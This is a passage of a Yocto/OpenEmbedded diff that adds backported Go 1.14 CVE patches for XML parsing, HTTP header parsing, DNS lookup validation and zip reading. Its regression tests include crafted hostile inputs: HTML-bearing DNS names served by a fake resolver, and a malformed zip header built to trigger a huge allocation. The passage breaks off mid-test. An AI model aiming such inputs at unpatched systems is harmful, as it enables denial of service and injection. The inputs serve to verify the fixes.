+diff --git a/src/net/url/url.go b/src/net/url/url.go
+index 73079a5..1e8baf9 100644
+--- a/src/net/url/url.go
++++ b/src/net/url/url.go
+@@ -1109,17 +1109,23 @@ func (u *URL) UnmarshalBinary(text []byte) error {
+ // any existing path and the resulting path cleaned of any ./ or ../ elements.
+ // Any sequences of multiple / characters will be reduced to a single /.
+ func (u *URL) JoinPath(elem ...string) *URL {
+- url := *u
+- if len(elem) > 0 {
+- elem = append([]string{u.EscapedPath()}, elem...)
+- p := path.Join(elem...)
+- // path.Join will remove any trailing slashes.
+- // Preserve at least one.
+- if strings.HasSuffix(elem[len(elem)-1], "/") && !strings.HasSuffix(p, "/") {
+- p += "/"
+- }
+- url.setPath(p)
++ elem = append([]string{u.EscapedPath()}, elem...)
++ var p string
++ if !strings.HasPrefix(elem[0], "/") {
++ // Return a relative path if u is relative,
++ // but ensure that it contains no ../ elements.
++ elem[0] = "/" + elem[0]
++ p = path.Join(elem...)[1:]
++ } else {
++ p = path.Join(elem...)
+ }
++ // path.Join will remove any trailing slashes.
++ // Preserve at least one.
++ if strings.HasSuffix(elem[len(elem)-1], "/") && !strings.HasSuffix(p, "/") {
++ p += "/"
++ }
++ url := *u
++ url.setPath(p)
+ return &url
+ }
+
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2020-29510.patch b/meta/recipes-devtools/go/go-1.14/CVE-2020-29510.patch
new file mode 100644
index 0000000000..e1c9e0bdb9
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2020-29510.patch
@@ -0,0 +1,65 @@
+From a0bf4d38dc2057d28396594264bbdd43d412de22 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Tue, 27 Oct 2020 00:21:30 +0100
+Subject: [PATCH] encoding/xml: replace comments inside directives with a space
+
+A Directive (like <!ENTITY xxx []>) can't have other nodes nested inside
+it (in our data structure representation), so there is no way to
+preserve comments. The previous behavior was to just elide them, which
+however might change the semantic meaning of the surrounding markup.
+Instead, replace them with a space which hopefully has the same semantic
+effect of the comment.
+
+Directives are not actually a node type in the XML spec, which instead
+specifies each of them separately (<!ENTITY, <!DOCTYPE, etc.), each with
+its own grammar. The rules for where and when the comments are allowed
+are not straightforward, and can't be implemented without implementing
+custom logic for each of the directives.
+
+Simply preserving the comments in the body of the directive would be
+problematic, as there can be unmatched quotes inside the comment.
+Whether those quotes are considered meaningful semantically or not,
+other parsers might disagree and interpret the output differently.
+
+This issue was reported by Juho Nurminen of Mattermost as it leads to
+round-trip mismatches. See #43168. It's not being fixed in a security
+release because round-trip stability is not a currently supported
+security property of encoding/xml, and we don't believe these fixes
+would be sufficient to reliably guarantee it in the future.
+
+Fixes CVE-2020-29510
+Updates #43168
+
+Change-Id: Icd86c75beff3e1e0689543efebdad10ed5178ce3
+Reviewed-on: https://go-review.googlesource.com/c/go/+/277893
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Trust: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/a9cfd55e2b09735a25976d1b008a0a3c767494f8
+CVE: CVE-2020-29510
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/encoding/xml/xml.go | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/src/encoding/xml/xml.go b/src/encoding/xml/xml.go
+index 01a1460..98647b2 100644
+--- a/src/encoding/xml/xml.go
++++ b/src/encoding/xml/xml.go
+@@ -768,6 +768,12 @@ func (d *Decoder) rawToken() (Token, error) {
+ }
+ b0, b1 = b1, b
+ }
++
++ // Replace the comment with a space in the returned Directive
++ // body, so that markup parts that were separated by the comment
++ // (like a "<" and a "!") don't get joined when re-encoding the
++ // Directive, taking new semantic meaning.
++ d.buf.WriteByte(' ')
+ }
+ }
+ return Directive(d.buf.Bytes()), nil
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-27918.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-27918.patch
new file mode 100644
index 0000000000..faa3f7f641
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-27918.patch
@@ -0,0 +1,191 @@
+From d0b79e3513a29628f3599dc8860666b6eed75372 Mon Sep 17 00:00:00 2001
+From: Katie Hockman <katie@golang.org>
+Date: Mon, 1 Mar 2021 09:54:00 -0500
+Subject: [PATCH] encoding/xml: prevent infinite loop while decoding
+
+This change properly handles a TokenReader which
+returns an EOF in the middle of an open XML
+element.
+
+Thanks to Sam Whited for reporting this.
+
+Fixes CVE-2021-27918
+Fixes #44913
+
+Change-Id: Id02a3f3def4a1b415fa2d9a8e3b373eb6cb0f433
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1004594
+Reviewed-by: Russ Cox <rsc@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Filippo Valsorda <valsorda@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/300391
+Trust: Katie Hockman <katie@golang.org>
+Run-TryBot: Katie Hockman <katie@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Alexander Rakoczy <alex@golang.org>
+Reviewed-by: Filippo Valsorda <filippo@golang.org>
+
+https://github.com/golang/go/commit/d0b79e3513a29628f3599dc8860666b6eed75372
+CVE: CVE-2021-27918
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/encoding/xml/xml.go | 19 ++++---
+ src/encoding/xml/xml_test.go | 104 +++++++++++++++++++++++++++--------
+ 2 files changed, 92 insertions(+), 31 deletions(-)
+
+diff --git a/src/encoding/xml/xml.go b/src/encoding/xml/xml.go
+index adaf4daf198b9..6f9594d7ba7a3 100644
+--- a/src/encoding/xml/xml.go
++++ b/src/encoding/xml/xml.go
+@@ -271,7 +271,7 @@ func NewTokenDecoder(t TokenReader) *Decoder {
+ // it will return an error.
+ //
+ // Token implements XML name spaces as described by
+-// https://www.w3.org/TR/REC-xml-names/. Each of the
++// https://www.w3.org/TR/REC-xml-names/. Each of the
+ // Name structures contained in the Token has the Space
+ // set to the URL identifying its name space when known.
+ // If Token encounters an unrecognized name space prefix,
+@@ -285,16 +285,17 @@ func (d *Decoder) Token() (Token, error) {
+ if d.nextToken != nil {
+ t = d.nextToken
+ d.nextToken = nil
+- } else if t, err = d.rawToken(); err != nil {
+- switch {
+- case err == io.EOF && d.t != nil:
+- err = nil
+- case err == io.EOF && d.stk != nil && d.stk.kind != stkEOF:
+- err = d.syntaxError("unexpected EOF")
++ } else {
++ if t, err = d.rawToken(); t == nil && err != nil {
++ if err == io.EOF && d.stk != nil && d.stk.kind != stkEOF {
++ err = d.syntaxError("unexpected EOF")
++ }
++ return nil, err
+ }
+- return t, err
++ // We still have a token to process, so clear any
++ // errors (e.g. EOF) and proceed.
++ err = nil
+ }
+-
+ if !d.Strict {
+ if t1, ok := d.autoClose(t); ok {
+ d.nextToken = t
+diff --git a/src/encoding/xml/xml_test.go b/src/encoding/xml/xml_test.go
+index efddca43e9102..5672ebb375f0d 100644
+--- a/src/encoding/xml/xml_test.go
++++ b/src/encoding/xml/xml_test.go
+@@ -33,30 +33,90 @@ func (t *toks) Token() (Token, error) {
+
+ func TestDecodeEOF(t *testing.T) {
+ start := StartElement{Name: Name{Local: "test"}}
+- t.Run("EarlyEOF", func(t *testing.T) {
+- d := NewTokenDecoder(&toks{earlyEOF: true, t: []Token{
+- start,
+- start.End(),
+- }})
+- err := d.Decode(&struct {
+- XMLName Name `xml:"test"`
+- }{})
+- if err != nil {
+- t.Error(err)
++ tests := []struct {
++ name string
++ tokens []Token
++ ok bool
++ }{
++ {
++ name: "OK",
++ tokens: []Token{
++ start,
++ start.End(),
++ },
++ ok: true,
++ },
++ {
++ name: "Malformed",
++ tokens: []Token{
++ start,
++ StartElement{Name: Name{Local: "bad"}},
++ start.End(),
++ },
++ ok: false,
++ },
++ }
++ for _, tc := range tests {
++ for _, eof := range []bool{true, false} {
++ name := fmt.Sprintf("%s/earlyEOF=%v", tc.name, eof)
++ t.Run(name, func(t *testing.T) {
++ d := NewTokenDecoder(&toks{
++ earlyEOF: eof,
++ t: tc.tokens,
++ })
++ err := d.Decode(&struct {
++ XMLName Name `xml:"test"`
++ }{})
++ if tc.ok && err != nil {
++ t.Fatalf("d.Decode: expected nil error, got %v", err)
++ }
++ if _, ok := err.(*SyntaxError); !tc.ok && !ok {
++ t.Errorf("d.Decode: expected syntax error, got %v", err)
++ }
++ })
+ }
+- })
+- t.Run("LateEOF", func(t *testing.T) {
+- d := NewTokenDecoder(&toks{t: []Token{
+- start,
+- start.End(),
+- }})
+- err := d.Decode(&struct {
+- XMLName Name `xml:"test"`
+- }{})
+- if err != nil {
+- t.Error(err)
++ }
++}
++
++type toksNil struct {
++ returnEOF bool
++ t []Token
++}
++
++func (t *toksNil) Token() (Token, error) {
++ if len(t.t) == 0 {
++ if !t.returnEOF {
++ // Return nil, nil before returning an EOF. It's legal, but
++ // discouraged.
++ t.returnEOF = true
++ return nil, nil
+ }
+- })
++ return nil, io.EOF
++ }
++ var tok Token
++ tok, t.t = t.t[0], t.t[1:]
++ return tok, nil
++}
++
++func TestDecodeNilToken(t *testing.T) {
++ for _, strict := range []bool{true, false} {
++ name := fmt.Sprintf("Strict=%v", strict)
++ t.Run(name, func(t *testing.T) {
++ start := StartElement{Name: Name{Local: "test"}}
++ bad := StartElement{Name: Name{Local: "bad"}}
++ d := NewTokenDecoder(&toksNil{
++ // Malformed
++ t: []Token{start, bad, start.End()},
++ })
++ d.Strict = strict
++ err := d.Decode(&struct {
++ XMLName Name `xml:"test"`
++ }{})
++ if _, ok := err.(*SyntaxError); !ok {
++ t.Errorf("d.Decode: expected syntax error, got %v", err)
++ }
++ })
++ }
+ }
+
+ const testInput = `
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-31525.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-31525.patch
new file mode 100644
index 0000000000..afe4b0d2b8
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-31525.patch
@@ -0,0 +1,38 @@
+From efb465ada003d23353a91ef930be408eb575dba6 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 16 Jun 2022 17:40:12 +0530
+Subject: [PATCH] CVE-2021-31525
+
+Upstream-Status: Backport [https://github.com/argoheyard/lang-net/commit/701957006ef151feb43f86aa99c8a1f474f69282]
+CVE: CVE-2021-31525
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+---
+ src/vendor/golang.org/x/net/http/httpguts/httplex.go | 10 ++++++----
+ 1 file changed, 6 insertions(+), 4 deletions(-)
+
+diff --git a/src/vendor/golang.org/x/net/http/httpguts/httplex.go b/src/vendor/golang.org/x/net/http/httpguts/httplex.go
+index e7de24e..c79aa73 100644
+--- a/src/vendor/golang.org/x/net/http/httpguts/httplex.go
++++ b/src/vendor/golang.org/x/net/http/httpguts/httplex.go
+@@ -137,11 +137,13 @@ func trimOWS(x string) string {
+ // contains token amongst its comma-separated tokens, ASCII
+ // case-insensitively.
+ func headerValueContainsToken(v string, token string) bool {
+- v = trimOWS(v)
+- if comma := strings.IndexByte(v, ','); comma != -1 {
+- return tokenEqual(trimOWS(v[:comma]), token) || headerValueContainsToken(v[comma+1:], token)
++ for comma := strings.IndexByte(v, ','); comma != -1; comma = strings.IndexByte(v, ',') {
++ if tokenEqual(trimOWS(v[:comma]), token) {
++ return true
++ }
++ v = v[comma+1:]
+ }
+- return tokenEqual(v, token)
++ return tokenEqual(trimOWS(v), token)
+ }
+
+ // lowerASCII returns the ASCII lowercase version of b.
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33195.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33195.patch
new file mode 100644
index 0000000000..3d9de888ff
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33195.patch
@@ -0,0 +1,373 @@
+From 9324d7e53151e9dfa4b25af994a28c2e0b11f729 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Thu, 27 May 2021 10:40:06 -0700
+Subject: [PATCH] net: verify results from Lookup* are valid domain names
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/31d60cda1f58b7558fc5725d2b9e4531655d980e]
+CVE: CVE-2021-33195
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+For the methods LookupCNAME, LookupSRV, LookupMX, LookupNS, and
+LookupAddr check that the returned domain names are in fact valid DNS
+names using the existing isDomainName function.
+
+Thanks to Philipp Jeitner and Haya Shulman from Fraunhofer SIT for
+reporting this issue.
+
+Updates #46241
+Fixes #46356
+Fixes CVE-2021-33195
+
+Change-Id: I47a4f58c031cb752f732e88bbdae7f819f0af4f3
+Reviewed-on: https://go-review.googlesource.com/c/go/+/323131
+Trust: Roland Shoemaker <roland@golang.org>
+Run-TryBot: Roland Shoemaker <roland@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+(cherry picked from commit cdcd02842da7c004efd023881e3719105209c908)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/323269
+---
+ src/net/dnsclient_unix_test.go | 157 +++++++++++++++++++++++++++++++++
+ src/net/lookup.go | 111 ++++++++++++++++++++---
+ 2 files changed, 255 insertions(+), 13 deletions(-)
+
+diff --git a/src/net/dnsclient_unix_test.go b/src/net/dnsclient_unix_test.go
+index 2ad40df..b8617d9 100644
+--- a/src/net/dnsclient_unix_test.go
++++ b/src/net/dnsclient_unix_test.go
+@@ -1800,3 +1800,160 @@ func TestPTRandNonPTR(t *testing.T) {
+ t.Errorf("names = %q; want %q", names, want)
+ }
+ }
++
++func TestCVE202133195(t *testing.T) {
++ fake := fakeDNSServer{
++ rh: func(n, _ string, q dnsmessage.Message, _ time.Time) (dnsmessage.Message, error) {
++ r := dnsmessage.Message{
++ Header: dnsmessage.Header{
++ ID: q.Header.ID,
++ Response: true,
++ RCode: dnsmessage.RCodeSuccess,
++ RecursionAvailable: true,
++ },
++ Questions: q.Questions,
++ }
++ switch q.Questions[0].Type {
++ case dnsmessage.TypeCNAME:
++ r.Answers = []dnsmessage.Resource{}
++ case dnsmessage.TypeA: // CNAME lookup uses a A/AAAA as a proxy
++ r.Answers = append(r.Answers,
++ dnsmessage.Resource{
++ Header: dnsmessage.ResourceHeader{
++ Name: dnsmessage.MustNewName("<html>.golang.org."),
++ Type: dnsmessage.TypeA,
++ Class: dnsmessage.ClassINET,
++ Length: 4,
++ },
++ Body: &dnsmessage.AResource{
++ A: TestAddr,
++ },
++ },
++ )
++ case dnsmessage.TypeSRV:
++ n := q.Questions[0].Name
++ if n.String() == "_hdr._tcp.golang.org." {
++ n = dnsmessage.MustNewName("<html>.golang.org.")
++ }
++ r.Answers = append(r.Answers,
++ dnsmessage.Resource{
++ Header: dnsmessage.ResourceHeader{
++ Name: n,
++ Type: dnsmessage.TypeSRV,
++ Class: dnsmessage.ClassINET,
++ Length: 4,
++ },
++ Body: &dnsmessage.SRVResource{
++ Target: dnsmessage.MustNewName("<html>.golang.org."),
++ },
++ },
++ )
++ case dnsmessage.TypeMX:
++ r.Answers = append(r.Answers,
++ dnsmessage.Resource{
++ Header: dnsmessage.ResourceHeader{
++ Name: dnsmessage.MustNewName("<html>.golang.org."),
++ Type: dnsmessage.TypeMX,
++ Class: dnsmessage.ClassINET,
++ Length: 4,
++ },
++ Body: &dnsmessage.MXResource{
++ MX: dnsmessage.MustNewName("<html>.golang.org."),
++ },
++ },
++ )
++ case dnsmessage.TypeNS:
++ r.Answers = append(r.Answers,
++ dnsmessage.Resource{
++ Header: dnsmessage.ResourceHeader{
++ Name: dnsmessage.MustNewName("<html>.golang.org."),
++ Type: dnsmessage.TypeNS,
++ Class: dnsmessage.ClassINET,
++ Length: 4,
++ },
++ Body: &dnsmessage.NSResource{
++ NS: dnsmessage.MustNewName("<html>.golang.org."),
++ },
++ },
++ )
++ case dnsmessage.TypePTR:
++ r.Answers = append(r.Answers,
++ dnsmessage.Resource{
++ Header: dnsmessage.ResourceHeader{
++ Name: dnsmessage.MustNewName("<html>.golang.org."),
++ Type: dnsmessage.TypePTR,
++ Class: dnsmessage.ClassINET,
++ Length: 4,
++ },
++ Body: &dnsmessage.PTRResource{
++ PTR: dnsmessage.MustNewName("<html>.golang.org."),
++ },
++ },
++ )
++ }
++ return r, nil
++ },
++ }
++
++ r := Resolver{PreferGo: true, Dial: fake.DialContext}
++ // Change the default resolver to match our manipulated resolver
++ originalDefault := DefaultResolver
++ DefaultResolver = &r
++ defer func() {
++ DefaultResolver = originalDefault
++ }()
++
++ _, err := r.LookupCNAME(context.Background(), "golang.org")
++ if expected := "lookup golang.org: CNAME target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupCNAME returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, err = LookupCNAME("golang.org")
++ if expected := "lookup golang.org: CNAME target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupCNAME returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++
++ _, _, err = r.LookupSRV(context.Background(), "target", "tcp", "golang.org")
++ if expected := "lookup golang.org: SRV target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, _, err = LookupSRV("target", "tcp", "golang.org")
++ if expected := "lookup golang.org: SRV target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++
++ _, _, err = r.LookupSRV(context.Background(), "hdr", "tcp", "golang.org")
++ if expected := "lookup golang.org: SRV header name is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, _, err = LookupSRV("hdr", "tcp", "golang.org")
++ if expected := "lookup golang.org: SRV header name is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++
++ _, err = r.LookupMX(context.Background(), "golang.org")
++ if expected := "lookup golang.org: MX target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupMX returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, err = LookupMX("golang.org")
++ if expected := "lookup golang.org: MX target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupMX returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++
++ _, err = r.LookupNS(context.Background(), "golang.org")
++ if expected := "lookup golang.org: NS target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupNS returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, err = LookupNS("golang.org")
++ if expected := "lookup golang.org: NS target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupNS returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++
++ _, err = r.LookupAddr(context.Background(), "1.2.3.4")
++ if expected := "lookup 1.2.3.4: PTR target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupAddr returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, err = LookupAddr("1.2.3.4")
++ if expected := "lookup 1.2.3.4: PTR target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupAddr returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++}
+diff --git a/src/net/lookup.go b/src/net/lookup.go
+index 9cebd10..05e88e4 100644
+--- a/src/net/lookup.go
++++ b/src/net/lookup.go
+@@ -364,8 +364,11 @@ func (r *Resolver) LookupPort(ctx context.Context, network, service string) (por
+ // LookupCNAME does not return an error if host does not
+ // contain DNS "CNAME" records, as long as host resolves to
+ // address records.
++//
++// The returned canonical name is validated to be a properly
++// formatted presentation-format domain name.
+ func LookupCNAME(host string) (cname string, err error) {
+- return DefaultResolver.lookupCNAME(context.Background(), host)
++ return DefaultResolver.LookupCNAME(context.Background(), host)
+ }
+
+ // LookupCNAME returns the canonical name for the given host.
+@@ -378,8 +381,18 @@ func LookupCNAME(host string) (cname string, err error) {
+ // LookupCNAME does not return an error if host does not
+ // contain DNS "CNAME" records, as long as host resolves to
+ // address records.
+-func (r *Resolver) LookupCNAME(ctx context.Context, host string) (cname string, err error) {
+- return r.lookupCNAME(ctx, host)
++//
++// The returned canonical name is validated to be a properly
++// formatted presentation-format domain name.
++func (r *Resolver) LookupCNAME(ctx context.Context, host string) (string, error) {
++ cname, err := r.lookupCNAME(ctx, host)
++ if err != nil {
++ return "", err
++ }
++ if !isDomainName(cname) {
++ return "", &DNSError{Err: "CNAME target is invalid", Name: host}
++ }
++ return cname, nil
+ }
+
+ // LookupSRV tries to resolve an SRV query of the given service,
+@@ -391,8 +404,11 @@ func (r *Resolver) LookupCNAME(ctx context.Context, host string) (cname string,
+ // That is, it looks up _service._proto.name. To accommodate services
+ // publishing SRV records under non-standard names, if both service
+ // and proto are empty strings, LookupSRV looks up name directly.
++//
++// The returned service names are validated to be properly
++// formatted presentation-format domain names.
+ func LookupSRV(service, proto, name string) (cname string, addrs []*SRV, err error) {
+- return DefaultResolver.lookupSRV(context.Background(), service, proto, name)
++ return DefaultResolver.LookupSRV(context.Background(), service, proto, name)
+ }
+
+ // LookupSRV tries to resolve an SRV query of the given service,
+@@ -404,28 +420,82 @@ func LookupSRV(service, proto, name string) (cname string, addrs []*SRV, err err
+ // That is, it looks up _service._proto.name. To accommodate services
+ // publishing SRV records under non-standard names, if both service
+ // and proto are empty strings, LookupSRV looks up name directly.
+-func (r *Resolver) LookupSRV(ctx context.Context, service, proto, name string) (cname string, addrs []*SRV, err error) {
+- return r.lookupSRV(ctx, service, proto, name)
++//
++// The returned service names are validated to be properly
++// formatted presentation-format domain names.
++func (r *Resolver) LookupSRV(ctx context.Context, service, proto, name string) (string, []*SRV, error) {
++ cname, addrs, err := r.lookupSRV(ctx, service, proto, name)
++ if err != nil {
++ return "", nil, err
++ }
++ if cname != "" && !isDomainName(cname) {
++ return "", nil, &DNSError{Err: "SRV header name is invalid", Name: name}
++ }
++ for _, addr := range addrs {
++ if addr == nil {
++ continue
++ }
++ if !isDomainName(addr.Target) {
++ return "", nil, &DNSError{Err: "SRV target is invalid", Name: name}
++ }
++ }
++ return cname, addrs, nil
+ }
+
+ // LookupMX returns the DNS MX records for the given domain name sorted by preference.
++//
++// The returned mail server names are validated to be properly
++// formatted presentation-format domain names.
+ func LookupMX(name string) ([]*MX, error) {
+- return DefaultResolver.lookupMX(context.Background(), name)
++ return DefaultResolver.LookupMX(context.Background(), name)
+ }
+
+ // LookupMX returns the DNS MX records for the given domain name sorted by preference.
++//
++// The returned mail server names are validated to be properly
++// formatted presentation-format domain names.
+ func (r *Resolver) LookupMX(ctx context.Context, name string) ([]*MX, error) {
+- return r.lookupMX(ctx, name)
++ records, err := r.lookupMX(ctx, name)
++ if err != nil {
++ return nil, err
++ }
++ for _, mx := range records {
++ if mx == nil {
++ continue
++ }
++ if !isDomainName(mx.Host) {
++ return nil, &DNSError{Err: "MX target is invalid", Name: name}
++ }
++ }
++ return records, nil
+ }
+
+ // LookupNS returns the DNS NS records for the given domain name.
++//
++// The returned name server names are validated to be properly
++// formatted presentation-format domain names.
+ func LookupNS(name string) ([]*NS, error) {
+- return DefaultResolver.lookupNS(context.Background(), name)
++ return DefaultResolver.LookupNS(context.Background(), name)
+ }
+
+ // LookupNS returns the DNS NS records for the given domain name.
++//
++// The returned name server names are validated to be properly
++// formatted presentation-format domain names.
+ func (r *Resolver) LookupNS(ctx context.Context, name string) ([]*NS, error) {
+- return r.lookupNS(ctx, name)
++ records, err := r.lookupNS(ctx, name)
++ if err != nil {
++ return nil, err
++ }
++ for _, ns := range records {
++ if ns == nil {
++ continue
++ }
++ if !isDomainName(ns.Host) {
++ return nil, &DNSError{Err: "NS target is invalid", Name: name}
++ }
++ }
++ return records, nil
+ }
+
+ // LookupTXT returns the DNS TXT records for the given domain name.
+@@ -441,14 +511,29 @@ func (r *Resolver) LookupTXT(ctx context.Context, name string) ([]string, error)
+ // LookupAddr performs a reverse lookup for the given address, returning a list
+ // of names mapping to that address.
+ //
++// The returned names are validated to be properly formatted presentation-format
++// domain names.
++//
+ // When using the host C library resolver, at most one result will be
+ // returned. To bypass the host resolver, use a custom Resolver.
+ func LookupAddr(addr string) (names []string, err error) {
+- return DefaultResolver.lookupAddr(context.Background(), addr)
++ return DefaultResolver.LookupAddr(context.Background(), addr)
+ }
+
+ // LookupAddr performs a reverse lookup for the given address, returning a list
+ // of names mapping to that address.
+-func (r *Resolver) LookupAddr(ctx context.Context, addr string) (names []string, err error) {
+- return r.lookupAddr(ctx, addr)
++//
++// The returned names are validated to be properly formatted presentation-format
++// domain names.
++func (r *Resolver) LookupAddr(ctx context.Context, addr string) ([]string, error) {
++ names, err := r.lookupAddr(ctx, addr)
++ if err != nil {
++ return nil, err
++ }
++ for _, name := range names {
++ if !isDomainName(name) {
++ return nil, &DNSError{Err: "PTR target is invalid", Name: addr}
++ }
++ }
++ return names, nil
+ }
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch
new file mode 100644
index 0000000000..2e2dc62c49
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch
@@ -0,0 +1,124 @@
+From 74242baa4136c7a9132a8ccd9881354442788c8c Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Tue, 11 May 2021 11:31:31 -0700
+Subject: [PATCH] archive/zip: only preallocate File slice if reasonably sized
+
+Since the number of files in the EOCD record isn't validated, it isn't
+safe to preallocate Reader.Files using that field. A malformed archive
+can indicate it contains up to 1 << 128 - 1 files. We can still safely
+preallocate the slice by checking if the specified number of files in
+the archive is reasonable, given the size of the archive.
+
+Thanks to the OSS-Fuzz project for discovering this issue and to
+Emmanuel Odeke for reporting it.
+
+Fixes #46242
+Fixes CVE-2021-33196
+
+Change-Id: I3c76d8eec178468b380d87fdb4a3f2cb06f0ee76
+Reviewed-on: https://go-review.googlesource.com/c/go/+/318909
+Trust: Roland Shoemaker <roland@golang.org>
+Trust: Katie Hockman <katie@golang.org>
+Trust: Joe Tsai <thebrokentoaster@gmail.com>
+Run-TryBot: Roland Shoemaker <roland@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+Reviewed-by: Joe Tsai <thebrokentoaster@gmail.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-33196
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/archive/zip/reader.go | 10 +++++-
+ src/archive/zip/reader_test.go | 59 ++++++++++++++++++++++++++++++++++
+ 2 files changed, 68 insertions(+), 1 deletion(-)
+
+Index: go/src/archive/zip/reader.go
+===================================================================
+--- go.orig/src/archive/zip/reader.go
++++ go/src/archive/zip/reader.go
+@@ -84,7 +84,15 @@ func (z *Reader) init(r io.ReaderAt, siz
+ return err
+ }
+ z.r = r
+- z.File = make([]*File, 0, end.directoryRecords)
++ // Since the number of directory records is not validated, it is not
++ // safe to preallocate z.File without first checking that the specified
++ // number of files is reasonable, since a malformed archive may
++ // indicate it contains up to 1 << 128 - 1 files. Since each file has a
++ // header which will be _at least_ 30 bytes we can safely preallocate
++ // if (data size / 30) >= end.directoryRecords.
++ if (uint64(size)-end.directorySize)/30 >= end.directoryRecords {
++ z.File = make([]*File, 0, end.directoryRecords)
++ }
+ z.Comment = end.comment
+ rs := io.NewSectionReader(r, 0, size)
+ if _, err = rs.Seek(int64(end.directoryOffset), io.SeekStart); err != nil {
+Index: go/src/archive/zip/reader_test.go
+===================================================================
+--- go.orig/src/archive/zip/reader_test.go
++++ go/src/archive/zip/reader_test.go
+@@ -1070,3 +1070,62 @@ func TestIssue12449(t *testing.T) {
+ t.Errorf("Error reading the archive: %v", err)
+ }
+ }
++
++func TestCVE202133196(t *testing.T) {
++ // Archive that indicates it has 1 << 128 -1 files,
++ // this would previously cause a panic due to attempting
++ // to allocate a slice with 1 << 128 -1 elements.
++ data := []byte{
++ 0x50, 0x4b, 0x03, 0x04, 0x14, 0x00, 0x08, 0x08,
++ 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x01, 0x02,
++ 0x03, 0x62, 0x61, 0x65, 0x03, 0x04, 0x00, 0x00,
++ 0xff, 0xff, 0x50, 0x4b, 0x07, 0x08, 0xbe, 0x20,
++ 0x5c, 0x6c, 0x09, 0x00, 0x00, 0x00, 0x03, 0x00,
++ 0x00, 0x00, 0x50, 0x4b, 0x01, 0x02, 0x14, 0x00,
++ 0x14, 0x00, 0x08, 0x08, 0x08, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0xbe, 0x20, 0x5c, 0x6c, 0x09, 0x00,
++ 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00,
++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
++ 0x01, 0x02, 0x03, 0x50, 0x4b, 0x06, 0x06, 0x2c,
